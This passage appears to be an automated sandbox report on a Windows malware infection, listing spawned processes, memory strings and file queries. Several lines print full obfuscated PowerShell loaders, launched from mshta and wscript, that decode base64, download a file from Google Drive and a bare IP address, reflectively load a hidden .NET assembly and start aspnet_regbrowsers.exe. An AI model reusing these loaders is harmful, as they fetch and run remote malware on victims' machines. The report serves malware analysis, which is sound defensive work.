WRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jdvnz0u5niagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagywrelvrzueugicagicagicagicagicagicagicagicagicagicagic1trw1irxjeruzjbmlusu9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjsbu9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbxunqsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb3d3osc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbjrxdqwu8sdwludcagicagicagicagicagicagicagicagicagicagicagcvn5chzwzixjbnrqdhigicagicagicagicagicagicagicagicagicagicagig9vugdpwgnpayk7jyagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicjyiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfdrsagicagicagicagicagicagicagicagicagicagicagewnremruwnd6zcagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdvnz0u5njo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtm1lje2ni82mdavc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbnn0b2vizs50suyilcikzu52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmildasmck7c1rbunqtc0xlrvaomyk7c1rbcnqgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icggkcgnahl4aw1hz2vvcmwgpsbrtgvodhrwczovl2ryaxzllmdvbycrj2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1cibrtgu7ahl4d2viq2xpzw50id0gtmv3lu9ijysnamvjdcankydtexn0zscrj20utmv0lldlyknsawunkyduddtoexhpbwfnzuj5dgvzid0gahl4d2viq2xpzw50lkrvdycrj25sb2fkrccrj2f0yshoexhpbwfnzvvybck7ahl4aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoahl4aw1hz2vcexrlcyk7ahl4c3rhcnrgbgfnid0guuxlpdxcqvnfnicrjzrfu1rbulq+plfmzttoexhlbmrgbgfnid0guuxlpdxcqvnfnjrfru5epj5rtgu7ahl4c3rhcnrjbmrleca9igh5egltjysnywdlvgv4dc5jbmrlee9mkgh5ehn0yxj0rmxhzyk7ahl4zw5ksw5kzxggpsboexhpbwfnzvrlehqusw5kzxhpzihoexhlbmrgbgfnkttoexhzdgfydeluzgv4ic1nzsawic1hbmqgahl4zw5ksw5kzxgglwd0igh5ehn0yxj0sw5kzxg7ahl4c3rhcnrjbmrlecarpsboexhzdgfydezsywcutgvuz3roo2h5egjhc2u2nexlbmd0aca9igh5egvuzeknkyduzgv4ic0gahl4c3rhcnrjbmrledtoexhijysnyxnlnjrdb21tyw5kid0gahl4aw1hz2vuzxh0lln1ynn0cmluzyhoexhzdgfydeluzgv4lcboexhiyxnlnjrmzw5ndggpo2h5egjhc2u2nfjldmvyc2vkid0glwpvaw4gkgh5egjhjysnc2u2nenvbw1hbmquvg9dagenkydyqxjyyxkoksbwsjkgrm9yrwfjac1pymply3qgeyboexhfih0pwy0xjysnli4tkgh5egjhc2u2nenvbw1hbmqutgvuz3rokv07ahl4y29tbwfuzej5dccrj2vzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhoexhiyxnlnjrszxzlcnnlzck7ahl4bg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhknkyddojpmb2fkkccrj2h5egnvbw1hbmrcexrljysncyk7ahl4dmfptwv0ag9kid0gw2qnkydubglilklplkhvbwvdlkdlde1ldggnkydvzchrtgvwqulrtgupo2h5ehzhau1ldghvzc5jbnzva2uoahl4bnvsbcwgqchrtgv0ehquruvdrljflzawni82njeuntmxlju0mi4ynzevlzpwdhrouuxllcbrtgvkzxnhdgl2ywrvuuxllcbrtgvkzxnhdgl2ywqnkydvuuxljysnlcbrtgvkzxnhdgl2ywrvuuxllcbrtgvhc3ankyduzxrfcmvnynjvd3nlcnnrtgusiffmzwrlc2f0axzhzg9rtgusiffmzwrlc2f0axzhzg9rtgusuuxlzgvzyxrpdmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmzwrljysnc2f0jysnaxzhzg9rtgusuuxlzgvzyxrpjysndmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmztfrtgusuuxlzgvzyxrpdmfkb1fmzskpoycplwnyrxbmqunficaow2noqxjdmta0k1tjaefyxteymstby2hbcl0xmjaplftjaefyxtm2icatckvqtgfdzshby2hbcl04mstby2hbcl03nitby2hbcl0xmdeplftjaefyxtm5ic1yrvbmyunlj1zkoscsw2noqxjdmti0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('hyximageurl = qlehttps://drive.goo'+'gle.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur qle;hyxwebclient = new-ob'+'ject '+'syste'+'m.net.webclie'+'nt;hyximagebytes = hyxwebclient.dow'+'nloadd'+'ata(hyximageurl);hyximagetext = [system.text.encoding]::utf8.getstring(hyximagebytes);hyxstartflag = qle<<base6'+'4_start>>qle;hyxendflag = qle<<base64_end>>qle;hyxstartindex = hyxim'+'agetext.indexof(hyxstartflag);hyxendindex = hyximagetext.indexof(hyxendflag);hyxstartindex -ge 0 -and hyxendindex -gt hyxstartindex;hyxstartindex += hyxstartflag.length;hyxbase64length = hyxendi'+'ndex - hyxstartindex;hyxb'+'ase64command = hyximagetext.substring(hyxstartindex, hyxbase64length);hyxbase64reversed = -join (hyxba'+'se64command.tocha'+'rarray() vj9 foreach-object { hyx_ })[-1'+'..-(hyxbase64command.length)];hyxcommandbyt'+'es = [system.convert]::frombase64string(hyxbase64reversed);hyxloadedassembly = [system.reflection.assembly'+']::load('+'hyxcommandbyte'+'s);hyxvaimethod = [d'+'nlib.io.home].getmeth'+'od(qlevaiqle);hyxvaimethod.invoke(hyxnull, @(qletxt.eecfre/006/661.531.542.271//:ptthqle, qledesativadoqle, qledesativad'+'oqle'+', qledesativadoqle, qleasp'+'net_regbrowsersqle, qledesativadoqle, qledesativadoqle,qledesativadoqle,qledesativadoqle,qlede'+'sat'+'ivadoqle,qledesati'+'vadoqle,qledesativadoqle,qle1qle,qledesativadoqle));')-creplace ([char]104+[char]121+[char]120),[char]36 -replace([char]81+[char]76+[char]101),[char]39 -replace'vj9',[char]124))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jdvnz0u5niagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagywrelvrzueugicagicagicagicagicagicagicagicagicagicagic1trw1irxjeruzjbmlusu9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjsbu9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbxunqsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb3d3osc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbjrxdqwu8sdwludcagicagicagicagicagicagicagicagicagicagicagcvn5chzwzixjbnrqdhigicagicagicagicagicagicagicagicagicagicagig9vugdpwgnpayk7jyagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicjyiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfdrsagicagicagicagicagicagicagicagicagicagicagewnremruwnd6zcagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdvnz0u5njo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtm1lje2ni82mdavc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbnn0b2vizs50suyilcikzu52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmildasmck7c1rbunqtc0xlrvaomyk7c1rbcnqgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icggkcgnahl4aw1hz2vvcmwgpsbrtgvodhrwczovl2ryaxzllmdvbycrj2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1cibrtgu7ahl4d2viq2xpzw50id0gtmv3lu9ijysnamvjdcankydtexn0zscrj20utmv0lldlyknsawunkyduddtoexhpbwfnzuj5dgvzid0gahl4d2viq2xpzw50lkrvdycrj25sb2fkrccrj2f0yshoexhpbwfnzvvybck7ahl4aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoahl4aw1hz2vcexrlcyk7ahl4c3rhcnrgbgfnid0guuxlpdxcqvnfnicrjzrfu1rbulq+plfmzttoexhlbmrgbgfnid0guuxlpdxcqvnfnjrfru5epj5rtgu7ahl4c3rhcnrjbmrleca9igh5egltjysnywdlvgv4dc5jbmrlee9mkgh5ehn0yxj0rmxhzyk7ahl4zw5ksw5kzxggpsboexhpbwfnzvrlehqusw5kzxhpzihoexhlbmrgbgfnkttoexhzdgfydeluzgv4ic1nzsawic1hbmqgahl4zw5ksw5kzxgglwd0igh5ehn0yxj0sw5kzxg7ahl4c3rhcnrjbmrlecarpsboexhzdgfydezsywcutgvuz3roo2h5egjhc2u2nexlbmd0aca9igh5egvuzeknkyduzgv4ic0gahl4c3rhcnrjbmrledtoexhijysnyxnlnjrdb21tyw5kid0gahl4aw1hz2vuzxh0lln1ynn0cmluzyhoexhzdgfydeluzgv4lcboexhiyxnlnjrmzw5ndggpo2h5egjhc2u2nfjldmvyc2vkid0glwpvaw4gkgh5egjhjysnc2u2nenvbw1hbmquvg9dagenkydyqxjyyxkoksbwsjkgrm9yrwfjac1pymply3qgeyboexhfih0pwy0xjysnli4tkgh5egjhc2u2nenvbw1hbmqutgvuz3rokv07ahl4y29tbwfuzej5dccrj2vzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhoexhiyxnlnjrszxzlcnnlzck7ahl4bg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhknkyddojpmb2fkkccrj2h5egnvbw1hbmrcexrljysncyk7ahl4dmfptwv0ag9kid0gw2qnkydubglilklplkhvbwvdlkdlde1ldggnkydvzchrtgvwqulrtgupo2h5ehzhau1ldghvzc5jbnzva2uoahl4bnvsbcwgqchrtgv0ehquruvdrljflzawni82njeuntmxlju0mi4ynzevlzpwdhrouuxllcbrtgvkzxnhdgl2ywrvuuxllcbrtgvkzxnhdgl2ywqnkydvuuxljysnlcbrtgvkzxnhdgl2ywrvuuxllcbrtgvhc3ankyduzxrfcmvnynjvd3nlcnnrtgusiffmzwrlc2f0axzhzg9rtgusiffmzwrlc2f0axzhzg9rtgusuuxlzgvzyxrpdmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmzwrljysnc2f0jysnaxzhzg9rtgusuuxlzgvzyxrpjysndmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmztfrtgusuuxlzgvzyxrpdmfkb1fmzskpoycplwnyrxbmqunficaow2noqxjdmta0k1tjaefyxteymstby2hbcl0xmjaplftjaefyxtm2icatckvqtgfdzshby2hbcl04mstby2hbcl03nitby2hbcl0xmdeplftjaefyxtm5ic1yrvbmyunlj1zkoscsw2noqxjdmti0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('hyximageurl = qlehttps://drive.goo'+'gle.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur qle;hyxwebclient = new-ob'+'ject '+'syste'+'m.net.webclie'+'nt;hyximagebytes = hyxwebclient.dow'+'nloadd'+'ata(hyximageurl);hyximagetext = [system.text.encoding]::utf8.getstring(hyximagebytes);hyxstartflag = qle<<base6'+'4_start>>qle;hyxendflag = qle<<base64_end>>qle;hyxstartindex = hyxim'+'agetext.indexof(hyxstartflag);hyxendindex = hyximagetext.indexof(hyxendflag);hyxstartindex -ge 0 -and hyxendindex -gt hyxstartindex;hyxstartindex += hyxstartflag.length;hyxbase64length = hyxendi'+'ndex - hyxstartindex;hyxb'+'ase64command = hyximagetext.substring(hyxstartindex, hyxbase64length);hyxbase64reversed = -join (hyxba'+'se64command.tocha'+'rarray() vj9 foreach-object { hyx_ })[-1'+'..-(hyxbase64command.length)];hyxcommandbyt'+'es = [system.convert]::frombase64string(hyxbase64reversed);hyxloadedassembly = [system.reflection.assembly'+']::load('+'hyxcommandbyte'+'s);hyxvaimethod = [d'+'nlib.io.home].getmeth'+'od(qlevaiqle);hyxvaimethod.invoke(hyxnull, @(qletxt.eecfre/006/661.531.542.271//:ptthqle, qledesativadoqle, qledesativad'+'oqle'+', qledesativadoqle, qleasp'+'net_regbrowsersqle, qledesativadoqle, qledesativadoqle,qledesativadoqle,qledesativadoqle,qlede'+'sat'+'ivadoqle,qledesati'+'vadoqle,qledesativadoqle,qle1qle,qledesativadoqle));')-creplace ([char]104+[char]121+[char]120),[char]36 -replace([char]81+[char]76+[char]101),[char]39 -replace'vj9',[char]124))"	Jump to behavior

Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1751632000.0000000004460000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: explorer.exe, 0000000E.00000002.2535055415.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_029C55EB cpuid

19_2_029C55EB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
